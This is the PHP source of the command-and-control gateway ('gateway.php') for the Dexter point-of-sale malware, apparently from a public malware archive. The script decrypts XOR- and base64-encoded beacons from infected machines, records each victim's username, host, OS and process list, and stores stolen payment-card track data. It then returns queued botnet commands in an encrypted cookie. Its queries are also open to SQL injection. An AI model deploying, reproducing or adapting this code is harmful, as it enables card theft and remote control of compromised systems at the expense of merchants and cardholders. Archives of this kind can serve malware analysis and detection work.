/Dexter/panel/gateway.php

https://github.com/m0n0ph1/malware-1 · PHP · 185 lines · 111 code · 47 blank · 27 comment · 46 complexity · 7b93115195db0c0b085a1107c4cc1aed MD5 · raw file 

    

  1. <?php
    2. 

  2. 

  3. function _xor($src,$key) {
    4. 

  4. for($i=0;$i<strlen($src);$i++) {
    5. 

  5. for($x=0;$x<strlen($key);$x++) {
    6. 

  6. $src{$i} = $src{$i} ^ $key{$x};
    7. 

  7. }
    8. 

  8. }
    9. 

  9. return $src;
    10. 

  10. }
    11. 

  11. 

  12. function DecodeDecrypt($src,$key) {
    13. 

  13. $encodedData = str_replace(' ','+',$src);
    14. 

  14. $src = base64_decode($encodedData);
    15. 

  15. $dest = _xor($src,$key);
    16. 

  16. 

  17. return $dest;
    18. 

  18. }
    19. 

  19. 

  20. 

  21. function GetNextDump($AllDumps) {
    22. 

  22. 

  23. 

  24. if(strlen($AllDumps)<15) { return NULL; }
    25. 

  25. 

  26. 

  27. $Dump = strstr($AllDumps,"?",true);
    28. 

  28. $Dump = $Dump . "?";
    29. 

  29. 

  30. return $Dump;
    31. 

  31. }
    32. 

  32. 

  33. function GetTrackType($Dump) {
    34. 

  34. 

  35. $Type = NULL;
    36. 

  36. if($Dump{0}=='%') { $Type = "track1";  } else
    37. 

  37. if($Dump{0}==';') { $Type = "track2"; } else
    38. 

  38. if($Dump{0}=='+' || $Dump{0}=='!' || $Dump{0}=='#') { $Type =  "track3"; }
    39. 

  39. 

  40. return $Type;
    41. 

  41. }
    42. 

  42. 

  43. include ("config.php");
    44. 

  44. 

  45. //////////START/////////////////////////
    46. 

  46. if(!empty($_POST["page"]) && !empty($_POST["val"])) { //we have bot connected
    47. 

  47. 

  48. 

  49. $encodedData = str_replace(' ','+',$_POST["val"]);
    50. 

  50. $Key = base64_decode($encodedData); //get the Key
    51. 

  51. $UID = DecodeDecrypt($_POST["page"],$Key); //get the UID
    52. 

  52. 

  53. //Check if bot exist
    54. 

  54. $query = "SELECT * FROM `bots` WHERE `UID` = '$UID'"; 
    55. 

  55. $result = mysql_query($query);
    56. 

  56. $row = mysql_fetch_array($result);
    57. 

  57. 

  58. 

  59. if(empty($row)) { //new bot, insert
    60. 

  60. //POST variable names
    61. 

  61. //static char varUID[]           = "page=";
    62. 

  62. //static char varDumps[]         = "&ump=";
    63. 

  63. //static char varIdle[]          = "&opt=";
    64. 

  64. //static char varUsername[]      = "&unm=";
    65. 

  65. //static char varComputername[]  = "&cnm=";
    66. 

  66. //static char varProclist[]      = "&view=";
    67. 

  67. //static char varArch[]          = "&spec=";
    68. 

  68. //static char varOS[]            = "&query=";
    69. 

  69. //static char varKey[]           = "&val=";
    70. 

  70. //static char varVersion[]       = "&var=";
    71. 

  71. ///////////////////////////////////////////
    72. 

  72. 

  73. if(!empty($_POST["unm"])) { $Username = DecodeDecrypt($_POST["unm"],$Key); } else { $Username = ' '; }
    74. 

  74. if(!empty($_POST["cnm"])) { $Computername = DecodeDecrypt($_POST["cnm"],$Key); } else { $Computername = ' '; }
    75. 

  75. if(!empty($_POST["query"])) { $OS = DecodeDecrypt($_POST["query"],$Key); } else { $OS = ' '; }
    76. 

  76. if(!empty($_POST["spec"])) { $Arch = DecodeDecrypt($_POST["spec"],$Key); } else { $Arch = ' '; }
    77. 

  77. if(!empty($_POST["opt"])) { $Idle = DecodeDecrypt($_POST["opt"],$Key); } else { $Idle = ' '; }
    78. 

  78. if(!empty($_POST["var"])) { $Version = DecodeDecrypt($_POST["var"],$Key); } else { $Version = ' '; }
    79. 

  79. if(!empty($_POST["view"])) { $ProcList = DecodeDecrypt($_POST["view"],$Key); $ProcList = addslashes($ProcList); } else { $ProcList = ' '; }
    80. 

  80. if(empty($_POST["ip"])) { $RemoteIP = $_SERVER['REMOTE_ADDR']; } else { $RemoteIP = $_POST["ip"]; }
    81. 

  81. if(empty($_SERVER['HTTP_USER_AGENT'])) { $UserAgent = 'User-Agent: Not Captured'; } else { $UserAgent = $_SERVER['HTTP_USER_AGENT']; }
    82. 

  82. $LastVisit = time();
    83. 

  83. 

  84. $query = "SELECT * FROM `commands` ORDER BY `InsertTime` DESC LIMIT 0 , 30";
    85. 

  85. $result = mysql_query($query);
    86. 

  86. $row = mysql_fetch_array($result);
    87. 

  87. $LastCommand = $row["InsertTime"];
    88. 

  88. 

  89. $insert = "INSERT INTO `" . $dbname . "`.`bots` (`UID`,`Version`,`Username`,`Computername`,`RemoteIP`,`UserAgent`,`OS`,`Architecture`,`Idle Time`,`Process List`,`LastVisit`,`LastCommand`)VALUES ('$UID','$Version','$Username','$Computername','$RemoteIP','$UserAgent','$OS','$Arch','$Idle','$ProcList','$LastVisit', '$LastCommand' )"; //insert Bot
    90. 

  90. mysql_query($insert);
    91. 

  91. 

  92. //Insert dumps
    93. 

  93. if(!empty($_POST["ump"])) { 
    94. 

  94. $Dumps = DecodeDecrypt($_POST["ump"],$Key);
    95. 

  95. $Dumps = addslashes($Dumps);
    96. 

  96. $insert = "INSERT INTO`" . $dbname . "`.`logs` (`UID` ,`Dumps` )VALUES ('$UID','$Dumps')";
    97. 

  97. mysql_query($insert);
    98. 

  98. }
    99. 

  99. 

  100. } //REGISTERED NEW BOT 
    101. 

  101. else { //not new bot, update the dynamic fields
    102. 

  102. 	
    103. 

  103. if(!empty($_POST["opt"])) { $Idle = DecodeDecrypt($_POST["opt"],$Key); } else { $Idle = ' '; }
    104. 

  104. if(!empty($_POST["view"])) { $ProcList = DecodeDecrypt($_POST["view"],$Key); $ProcList = addslashes($ProcList); } else { $ProcList = ' '; }
    105. 

  105. if(!empty($_POST["var"])) { $Version = DecodeDecrypt($_POST["var"],$Key); } else { $Version = ' '; }
    106. 

  106. if(empty($_POST["ip"])) { $RemoteIP = $_SERVER['REMOTE_ADDR']; } else { $RemoteIP = $_POST["ip"]; }
    107. 

  107. if(empty($_SERVER['HTTP_USER_AGENT'])) { $UserAgent = 'User-Agent: Not Captured'; } else { $UserAgent = $_SERVER['HTTP_USER_AGENT']; }
    108. 

  108. $LastVisit = time();
    109. 

  109. 

  110. $update = "UPDATE `" . $dbname . "`.`bots` SET `Process List` = '$ProcList', `Idle Time` = '$Idle', `RemoteIP` = '$RemoteIP', `UserAgent` = '$UserAgent', `LastVisit` = '$LastVisit' WHERE `UID` = '$UID'";
    111. 

  111. mysql_query($update);
    112. 

  112. 

  113. //Insert dumps
    114. 

  114. if(!empty($_POST["ump"])) { 
    115. 

  115. $Dumps = DecodeDecrypt($_POST["ump"],$Key);
    116. 

  116. $Dumps = addslashes($Dumps);
    117. 

  117. 

  118. 

  119. $DumpsTime = time();
    120. 

  120. $Dump = NULL;
    121. 

  121. $Bin = NULL;
    122. 

  122. $ServiceCode = NULl;
    123. 

  123. $Type = NULL;
    124. 

  124. 

  125. //Skip process name
    126. 

  126. $AllDumps = NULL;
    127. 

  127. $AllDumps = strstr($Dumps,":");
    128. 

  128. if($AllDumps==NULL) { $AllDumps = $Dumps; } else { $AllDumps = substr($Start,1); }
    129. 

  129. 

  130. while(($Dump = GetNextDump($AllDumps))!=NULL) { 
    131. 

  131. //echo $Dump;
    132. 

  132. $AllDumps = substr($AllDumps,strlen($Dump));
    133. 

  133. $Type = GetTrackType($Dump);
    134. 

  134. $insert = "INSERT INTO`" . $dbname . "`.`logs` (`UID` , `IP`, `Dump`,`Type`,`Bin`,`ServiceCode`,`InsertTime` )VALUES ('$UID','$RemoteIP','$Dump','$Type','$Bin','$ServiceCode','$DumpsTime')";
    135. 

  135. mysql_query($insert);
    136. 

  136. 

  137. }
    138. 

  138. 

  139. 

  140. }
    141. 

  141. 

  142. } //UPDATE DYNAMIC FIELDS
    143. 

  143. 

  144. //Check if there is command to send
    145. 

  145. $cookieData = "$";
    146. 

  146. 

  147. //Query bot last command time
    148. 

  148. $query = "SELECT `LastCommand` FROM `bots` WHERE `UID` LIKE '$UID'";
    149. 

  149. $row = mysql_fetch_array(mysql_query($query));
    150. 

  150. $LastCommand = $row["LastCommand"];
    151. 

  151. 

  152. 

  153. $query = "SELECT * FROM `commands` WHERE `UID` LIKE '$UID' AND `InsertTime` > '$LastCommand' OR `UID` LIKE \"\" AND `InsertTime` > '$LastCommand'";
    154. 

  154. //echo $query;
    155. 

  155. $result = mysql_query($query);
    156. 

  156. 

  157. $LastCommand = 0;
    158. 

  158. if(!empty($result)) {
    159. 

  159. while($row = mysql_fetch_array($result)) {
    160. 

  160. $cookieData .= $row["Command"];
    161. 

  161. $cookieData .= ";";
    162. 

  162. $LastCommand = $row["InsertTime"];
    163. 

  163. }
    164. 

  164. }
    165. 

  165. 

  166. $cookieData .= '#';
    167. 

  167. ////////////////////////////////
    168. 

  168. 

  169. //Update the bot last command
    170. 

  170. if($LastCommand!=0) {
    171. 

  171. $update = "UPDATE `" . $dbname . "`.`bots` SET `LastCommand` = '$LastCommand' WHERE `UID` = '$UID'";
    172. 

  172. mysql_query($update);
    173. 

  173. }
    174. 

  174. //////////////////////////////////////
    175. 

  175. 

  176. //echo $cookieData;
    177. 

  177. //Display the command
    178. 

  178. $cookieData = base64_encode(_xor($cookieData, $Key));
    179. 

  179. setcookie('response',$cookieData);
    180. 

  180. 

  181. //////////////////////////
    182. 

  182. 

  183. } //THERE IS BOT CONNECTED
    184. 

  184. 

  185. ?>
    186.